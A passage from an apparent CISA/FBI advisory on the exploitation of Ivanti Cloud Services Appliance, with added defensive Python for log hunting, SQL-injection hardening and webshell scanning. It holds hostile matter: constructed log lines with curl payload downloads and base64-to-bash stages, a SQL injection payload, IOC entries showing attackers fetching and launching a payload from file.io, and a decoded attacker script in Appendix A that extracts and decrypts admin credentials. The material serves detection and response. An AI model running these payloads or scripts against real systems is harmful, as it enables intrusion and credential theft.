In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.
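The two log sources this advisory leans on, /var/log/messages (the gsb timezone entries shown in Appendix A) and /var/log/secure (the sudo entries in Appendix B), can be hunted with a short script. The following is an added example written for this page, not tooling from CISA, FBI or Ivanti. The log lines it runs on are constructed to mirror the formats shown in the appendices (using a TEST-NET address, 203.0.113.10), and the regular expressions are assumptions about the log format rather than a published specification; tune them against a known-good appliance before relying on them.

```python
import base64
import re

# gsb writes the TIMEZONE value it received to /var/log/messages.  A genuine
# value is an IANA zone name ("America/New_York"); a shell fragment is not.
TZ_LOG_RE = re.compile(
    r"gsb\[\d+\]: /etc/php\.ini\s*rewritten with new timezone: '(?P<tz>.*)'")
VALID_TZ_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_+\-]*(/[A-Za-z0-9_+\-]+)*$")
SHELL_META_RE = re.compile(r"[;|`$&]|\bbase64\s+-d\b")
B64_STAGE_RE = re.compile(
    r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*(?:/usr/bin/)?base64\s+-d")

# /var/log/secure entry shape: "sudo: <user> : <notes> ; COMMAND=<cmd>"
SUDO_LOG_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:(?P<notes>.*?)COMMAND=(?P<cmd>.*)$")
# Commands the advisory attributes to the actors: chaining onto an allowed
# binary, disabling SELinux, patching DateTimeTab.php, wiping logs, timestomping.
SUDO_SUSPICIOUS = [
    (re.compile(r"[;|`]"), "shell metacharacter in sudo command"),
    (re.compile(r"setenforce\s+0"), "SELinux disabled"),
    (re.compile(r"sed -i .*DateTimeTab\.php"), "DateTimeTab.php patched"),
    (re.compile(r"rm\s+/var/log/"), "log file removed"),
    (re.compile(r"touch -r "), "timestamp cloned (possible timestomping)"),
    (re.compile(r"webroot/.*\.php"), "webroot PHP file written or removed"),
]


def decode_b64_stages(text):
    """Decode every `echo <b64> | base64 -d` stage found in text.  Blobs
    captured from logs are often truncated, so padding is repaired and a
    failure is reported rather than raised."""
    decoded = []
    for blob in B64_STAGE_RE.findall(text):
        padded = blob + "=" * (-len(blob) % 4)
        try:
            decoded.append(base64.b64decode(padded).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError
            decoded.append("<undecodable>")
    return decoded


def check_timezone_line(line):
    """Flag a gsb timezone entry whose value is not a plain zone name."""
    m = TZ_LOG_RE.search(line)
    if not m:
        return None
    tz = m.group("tz")
    if VALID_TZ_RE.match(tz) and not SHELL_META_RE.search(tz):
        return None
    return {"type": "timezone_injection", "value": tz,
            "decoded": decode_b64_stages(tz)}


def check_sudo_line(line):
    """Flag sudo use by the web-server account or with evasion commands."""
    m = SUDO_LOG_RE.search(line)
    if not m:
        return None
    user, cmd = m.group("user"), m.group("cmd")
    reasons = [why for rx, why in SUDO_SUSPICIOUS if rx.search(cmd)]
    # The PHP application runs as 'nobody'; it should never reach sudo at all.
    if user == "nobody" or "NOT in sudoers" in m.group("notes"):
        reasons.insert(0, "sudo invoked by web-server account")
    if not reasons:
        return None
    return {"type": "sudo_abuse", "user": user, "command": cmd, "reasons": reasons}


def hunt(lines):
    """Run both checks over raw lines from /var/log/messages and /var/log/secure."""
    findings = []
    for line in lines:
        hit = check_timezone_line(line) or check_sudo_line(line)
        if hit:
            findings.append(hit)
    return findings


# Constructed sample lines in the formats shown in Appendix A and B.
_STAGE = base64.b64encode(b"curl 203.0.113.10/b.sh -o /dev/shm/b.sh").decode()
SAMPLE_LINES = [
    "Sep  6 01:12:03 csa gsb[1001]: /etc/php.ini rewritten with new timezone: 'America/Chicago' (1)",
    "Sep  8 10:41:35 csa gsb[7475]: /etc/php.ini rewritten with new timezone: ';curl 203.0.113.10/a.sh -o /dev/shm/a.sh;' (1)",
    "Sep  8 05:19:34 csa gsb[5325]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo " + _STAGE + " | /usr/bin/base64 -d | /bin/bash;' (1)",
    "Sep  8 11:00:00 csa sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/systemctl restart httpd",
    "Sep  8 12:00:00 csa sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0",
    "Sep  8 12:01:00 csa sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages",
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LINES):
        print(finding)
```

Feed it `hunt(open("/var/log/messages").readlines() + open("/var/log/secure").readlines())` on an exported copy of the logs. The timezone check is deliberately allow-list based (anything that is not a zone name is reported), so it does not depend on knowing the actors' current command shapes; the sudo patterns are the specific behaviours from Appendix B and should be treated as a starting list, not a complete one. Remember that the actors deleted /var/log/messages on at least one host, so a missing or truncated log is itself a finding.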

Lateral Movement

In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].

Exploit Chain 2

In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.

After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table.

After inserting valid bash code as a user in the user_info table, the threat actors attempted to log in as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid webshell [T1059]. However, there were no observations that the threat actors were successful.
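To make the LOCKOUTATTEMPTS handling described above concrete, here is an added example that models the vulnerable behaviour beside a hardened version and adds the hunt a defender would run on the user_info table afterwards. It is not Ivanti's code (the CSA application is PHP); it is an illustrative Python stand-in on sqlite3. The table and column names, and CURRENT_TIMESTAMP in place of NOW(), are adaptations for sqlite, and the injected username is a constructed placeholder rather than the string from the advisory.

```python
import re
import sqlite3

SCHEMA = """
CREATE TABLE settings  (lockout_attempts INTEGER NOT NULL);
INSERT INTO settings VALUES (5);
CREATE TABLE user_info (username TEXT, accessed TEXT, attempts INTEGER);
"""

# Shape of the value the advisory describes being typed into the lockout
# attempts box: a legitimate assignment, a statement separator, then an
# INSERT that creates a 'user' whose name is a shell fragment.
PAYLOAD = ("1 ;INSERT INTO user_info(username, accessed, attempts) "
           "VALUES ('''echo -n c3RhZ2U>>/.k''', CURRENT_TIMESTAMP, 10)")


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def save_lockout_vulnerable(conn, form_value):
    """Vulnerable model: the form value is spliced into the statement text
    and the whole string goes to the engine, which runs every statement it
    finds.  'lockout_attempts = 1' is applied, and so is the INSERT after it."""
    conn.executescript(f"UPDATE settings SET lockout_attempts = {form_value};")


def save_lockout_hardened(conn, form_value):
    """Hardened model: validate the type the field actually has, then bind
    the value as a parameter so the driver never parses it as SQL."""
    if not re.fullmatch(r"\d{1,3}", form_value.strip()):
        raise ValueError("LOCKOUTATTEMPTS must be an integer between 0 and 999")
    conn.execute("UPDATE settings SET lockout_attempts = ?", (int(form_value),))
    conn.commit()


def lockout_value(conn):
    return conn.execute("SELECT lockout_attempts FROM settings").fetchone()[0]


# Account names never legitimately contain quotes, redirects or commands.
SUSPICIOUS_USERNAME_RE = re.compile(r"[;'`|>$]|\becho\b")


def find_injected_users(conn):
    """Hunt: rows in user_info whose username looks like a shell fragment,
    the anomalous account creation Victim Organization 1 noticed."""
    return [u for (u,) in conn.execute("SELECT username FROM user_info")
            if SUSPICIOUS_USERNAME_RE.search(u)]


def demo():
    vuln = fresh_db()
    save_lockout_vulnerable(vuln, PAYLOAD)
    injected = find_injected_users(vuln)        # the bogus row rode along

    hard = fresh_db()
    try:
        save_lockout_hardened(hard, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    save_lockout_hardened(hard, "3")             # a legitimate change still works
    return (injected, rejected, lockout_value(vuln), lockout_value(hard),
            find_injected_users(hard))


if __name__ == "__main__":
    print(demo())
```

The hardened path does two independent things, and both matter: the integer check stops this payload, but parameter binding is what stops the next one, because a bound value is transported to the engine as data and is never re-parsed as statement text. On a live appliance the same find_injected_users query (against the PostgreSQL brokerdb) is a quick triage step, since the advisory notes the injected rows sit in user_info whether or not the follow-on webshell attempt succeeded.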

Detection of Activity

According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.

Victim Organization 1

The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.

Victim Organization 2

This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.

Victim Organization 3

This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.

Indicators of Compromise

See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.

Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

Table 1: IP Address Used for Credential Theft, September 2024
File Name IP Address Description
/client/index.php%3f.php/gsb/datetime.php 142.171.217[.]195 /var/log/messages
/client/index.php%3f.php/gsb/datetime.php 154.64.226[.]166 /var/log/messages-20240904.gz
/client/index.php%3f.php/gsb/datetime.php 216.131.75[.]53  
/client/index.php%3f.php/gsb/datetime.php 23.236.66[.]97 /var/log/messages-20240905.gz
/client/index.php%3f.php/gsb/datetime.php 38.207.159[.]76 /var/log/messages-20240906.gz
Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024
File Name IP Address Description
  149.154.167[.]41  
  95.161.76[.]100  
hxxps://file.io/E50vtqmJP5aa    
hxxps://file.io/RBKuU8gicWt    
hxxps://file.io/frdZ9L18R7Nx    
hxxp://ip.sb    
hxxps://pan.xj.hk/d/6401646e701f5f47518ecef48a308a36/redis    
  142.171.217[.]195  
  108.174.199[.]200  
  206.189.156[.]69  
  108.174.199[.]200/Xa27efd2.tmp  
  142.171.217[.]195  
Table 3: Additional IOCs Derived from Incident Response, September 2024
Type IOC Description
Ipv4 107.173.89[.]16  
Ipv4 38.207.159[.]76  
Ipv4 142.171.217[.]195  
Ipv4 154.64.226[.]166  
Ipv4 156.234.193[.]18  
Ipv4 216.131.75[.]53  
Ipv4 205.169.39[.]11  
Ipv4 23.236.66[.]97  
Ipv4 149.154.176[.]41  
Ipv4 95.161.76[.]100  
Ipv4 142.171.217[.]195  
Ipv4 108.174.199[.]200  
Ipv4 206.189.156[.]69  
Ipv4 142.171.217[.]195  
Ipv4 67.217.228[.]83  
Ipv4 203.160.72[.]174  
Ipv4 142.11.217[.]3  
Ipv4 104.168.133[.]228  
Ipv4 64.176.49[.]160  
Ipv4 45.141.215[.]17  
Ipv4 142.171.217[.]195  
Ipv4 98.101.25[.]30  
Ipv4 216.131.75[.]53  
Ipv4 134.195.90[.]71  
Ipv4 23.236.66[.]97  
Hash a50660fb31df96b3328640fdfbeea755  
Hash 53c5b7d124f13039eb62409e1ec2089d  
Hash 698a752ec1ca43237cb1dc791700afde  
Hash aa69300617faab4eb39b789ebfeb5abe  
Hash c2becc553b96ba27d60265d07ec3bd6c  
Hash cacc30e2a5b2683e19e45dc4f191cebc /opt/ivanti/csa/broker/webroot/client/help.php
Hash 061e5946c9595e560d64d5a8c65be49e /opt/landesk/broker/webroot/gsb/view.php
Hash e35cf026057a3729387b7ecfb213ae62a611f0f1a418876b11c9df3b56885bed /tmp/brokerdebug
Hash c7d20ca6fe596009afaeb725fec8635f /opt/landesk/broker/webroot/gsb/help.php
Hash F7F81AE880A17975F60E1E0FE1A4048B /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Hash 86B62FFD33597FD635E01B95F08BB996 /opt/landesk/broker/webroot/gsb/style.php
Hash DD975310201079CACD4CDE6FACAB8C1D /opt/landesk/broker/webroot/client/index.php
Hash 1B20E9310CA815F9E2BD366FB94E147F /sbin/systemd (configuration file at /WpService.conf)
Hash 30f57e14596f1bcad7cc4284d1af4684 /sbin/systemd (configuration file at /WpService.conf)

URL hxxps://file.io/E50vtqmJP5aa  
URL hxxps://file.io/RBKuU8gicWt  
URL hxxps://file.io/frdZ9L18R7Nx  
URL hxxp://ip.sb  
URL hxxps://pan.xj.hk/d/6401646e701f5f47518ecef48a308a36/redis  
URL 108.174.199.200/Xa27efd2.tmp  
URL 45.33.101.53/log  
URL 45.33.101.53/log2  
URL 208.184.237.75/fdsupdate  
URL 173.243.138.76/fdsupdate  
URL cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun  
URL cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun  
domain gg.oyr2ohrm.eyes[.]sh  
domain ggg.oyr2ohrm.eyes[.]sh  
domain gggg.oyr2ohrm.eyes[.]sh  
domain txt.xj[.]hk  
domain book.hacktricks[.]xyz  
host sh -c setsid /dev/shm/redis &  
host sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o /dev/shm/redis2  
host sh -c mv /dev/shm/redis2 /dev/shm/redis  
host sh -c rm /dev/shm/*  
host rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis  
host 78cc672218949a9ec87407ad3bcb5db6 Agent.zip
host d13f71e51b38ffef6b9dc8efbed27615 Log.log
host d88bfac2b43509abdc70308bef75e2a6 Log.exe
host 60d5648d35bacf5c7aa713b2a0d267d3 R.exe
host ae51c891d2e895b5ca919d14edd42c26 CAService.exe
host d88bfac2b43509abdc70308bef75e2a6 Lgfxsys.exe
host f82847bccb621e6822a3947bc9ce9621 NetlO.cfg
host c894f55c8fa9d92e2dd2c78172cff745 XboVFyKw.tmp
host MD5: Unknown Wi.bat
host MD5: Unknown dCUgGXfm.tmp
host MD5: Unknown DijZViHC.tmp
CrowdStrike Falcon e09fef2f502a41c199046219a6584e8d CrowdStrike falcon cid
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf  
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini  
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock --localtime --systohc   
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool --fullList  
Ipv4 142.171.217[.]195  
Ipv4 107.173.89[.]16  
Ipv4 192.42.116[.]210  
Ipv4 82.197.182[.]161  
Ipv4 154.213.185[.]230  
Ipv4 216.131.75[.]53  
Ipv4 23.236.66[.]97  
Ipv4 208.105.190[.]170  
Ipv4 136.144.17[.]145  
Ipv4 136.144.17[.]133  
Ipv4 216.73.162[.]56  
Ipv4 104.28.240[.]123  
Ipv4 163.5.171[.]49  
Ipv4 89.187.178[.]179  
Ipv4 163.5.171[.]49  
Ipv4 203.160.86[.]69  
Ipv4 185.220.69[.]83  
Ipv4 185.199.103[.]196  
Ipv4 188.172.229[.]15  
Ipv4 155.138.215[.]144  
Ipv4 64.176.49[.]160  
Ipv4 185.40.4[.]38  
Ipv4 216.131.75[.]53  
Ipv4 185.40.4[.]95  
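The file-system side of the IOCs above (the Table 3 hashes, the webshell contents, and the touch -r timestomping from Appendix B) can be checked in one pass over the webroot. The following is an added example, not a CISA/FBI or Ivanti tool. It builds a constructed sample webroot in a temporary directory, so the matches it reports are on placeholder files, not on a victim's data. The MD5 values are the ones in Table 3 (normalised to lowercase); the ctime/mtime heuristic is an assumption about how touch -r behaves on Linux (it copies atime and mtime, but ctime cannot be set from user space and always moves to "now"), so it produces leads to correlate, not verdicts.

```python
import hashlib
import os
import re
import tempfile
import time

# MD5s of files the advisory associates with the activity (Table 3), lowercased.
KNOWN_BAD_MD5 = {
    "cacc30e2a5b2683e19e45dc4f191cebc": "client/help.php",
    "061e5946c9595e560d64d5a8c65be49e": "gsb/view.php",
    "c7d20ca6fe596009afaeb725fec8635f": "gsb/help.php",
    "f7f81ae880a17975f60e1e0fe1a4048b": "gsb/DateTimeTab.php",
    "86b62ffd33597fd635e01b95f08bb996": "gsb/style.php",
    "dd975310201079cacd4cde6facab8c1d": "client/index.php",
}
# Execution of request input, as in the help.php/view.php/index.php/style.php
# shells described in the advisory; a short prefix such as "'/bin/sudo '. @"
# is tolerated before the superglobal.
WEBSHELL_RE = re.compile(
    r"\b(eval|system|passthru|shell_exec|exec)\s*\([^;]{0,40}\$_(POST|REQUEST|GET)\b")


def looks_timestomped(path, slack=3600):
    """touch -r clones atime/mtime but the kernel sets ctime to the moment of
    the change, so an mtime far older than ctime on a PHP file is a lead.
    Package installs also preserve mtime, so compare against a clean build."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack


def scan_webroot(root):
    """Return sorted (relative path, [reasons]) for every suspicious file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            reasons = []
            digest = hashlib.md5(data).hexdigest()
            if digest in KNOWN_BAD_MD5:
                reasons.append("md5 matches advisory IOC for " + KNOWN_BAD_MD5[digest])
            if name.endswith(".php") and WEBSHELL_RE.search(data.decode("utf-8", "replace")):
                reasons.append("webshell construct (eval/system on request input)")
            if looks_timestomped(path):
                reasons.append("mtime much older than ctime (possible touch -r)")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample: a clean page, a planted shell with placeholder
    content, and a page whose timestamp was cloned from an older file."""
    root = tempfile.mkdtemp(prefix="csa-webroot-")
    os.makedirs(os.path.join(root, "client"))
    with open(os.path.join(root, "client", "about.php"), "w") as fh:
        fh.write("<?php echo 'GSB main page'; ?>\n")
    with open(os.path.join(root, "client", "help.php"), "w") as fh:
        fh.write('<?php system(@$_REQUEST["a"]); ?>\n')
    stomped = os.path.join(root, "client", "index.php")
    with open(stomped, "w") as fh:
        fh.write("<?php echo 'GSB main page'; ?>\n")
    old = time.time() - 90 * 86400
    os.utime(stomped, (old, old))      # the effect of `touch -r <old file>`
    return root


if __name__ == "__main__":
    for rel, why in scan_webroot(build_sample_webroot()):
        print(rel, "->", "; ".join(why))
```

Run scan_webroot against /opt/landesk/broker/webroot (and /opt/ivanti/csa/broker/webroot on the newer layout) from a mounted image rather than the live appliance, since the advisory's incident response guidance is to reimage rather than clean. A hash hit is conclusive for that file; the content and timestamp checks are there because the actors edited existing files in place (the sed insertions into index.php and style.php), which changes the hash but leaves the eval pattern and the ctime gap behind.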

MITRE ATT&CK Tactics and Techniques

See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Reconnaissance
Technique Title ID Use
Active Scanning: Vulnerability Scanning T1595.002 Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities.
Table 5: Initial Access
Technique Title ID Use
Exploit Public-Facing Application T1190 Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications.
Table 6: Execution
Technique Title ID Use
Command and Scripting Interpreter T1059 Threat actors abused command and script interpreters to execute commands, scripts, or binaries.
Table 7: Persistence
Technique Title ID Use
Modify Authentication Process T1556 Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations’ networks.
Server Software Component: Web Shell T1505.003 Threat actors executed code to implant webshells for persistence.
Table 8: Privilege Escalation
Technique Title ID Use
Exploitation for Privilege Escalation T1068 Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server.
Table 9: Defense Evasion
Technique Title ID Use
Hide Artifacts: Hidden Users T1564.002 Threat actors acted as a hidden user to disguise their presence on a system.
Deobfuscate/Decode Files or Information T1140 Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file.
Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation.
Table 10: Credential Access
Technique Title ID Use
Unsecured Credentials: Credentials in Files T1552.001 Threat actors harvested encrypted admin credentials to gain further access.
Table 11: Lateral Movement
Technique Title ID Use
Exploitation of Remote Services T1210 Threat actors exploited CSAs via remote services to gain access to an organization’s networks by leveraging programming errors, EOL systems, and operating systems.
Table 12: Command and Control
Technique Title ID Use
Remote Access Software T1219 Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance.
Application Layer: Web Protocol T1071.001 Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens.
Table 13: Exfiltration
Technique Title ID Use
Exfiltration TA0010 Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use.

Incident Response

If compromise is detected, the authoring agencies recommend that organizations:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. For Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol and AD.
  5. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
    Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
  6. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

Mitigations

CISA and FBI recommend organizations: 

  • Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support.
  • Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity.
  • Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Secure remote access tools by:
    • Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Strictly limiting the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
      • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
  • Follow best cybersecurity practices in your production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

Validate Security Controls

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 4 through Table 13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

References

  1. Ivanti: Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)
  2. Ivanti: Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)
  3. Ivanti: Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)
  4. Fortinet: Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA

Contact Information

Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:

  • CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

Version History

January 22, 2025: Initial version.

Appendix A: Encoded and Decoded Scripts

Decoded Python Scripts

{
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
   if t and m:
       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ”
   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]
if r:
   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin’\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
   os.system(“tar zxvf {}”.format(r))
   while True:
       for f in os.listdir(‘.’):
           if re.match(“phpw{6}”, f):
               os.chmod(f, 0o777)
               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, “PASSWORD”, m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)
}
{
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
   if t and m:
       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ”
   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’service'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]
if r:
   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’service’\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
   os.system(“tar zxvf {}”.format(r))
   while True:
       for f in os.listdir(‘.’):
           if re.match(“phpw{6}”, f):
               os.chmod(f, 0o777)
               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, “PASSWORD”, m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)
}
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
   if t and m:
       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ”
   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
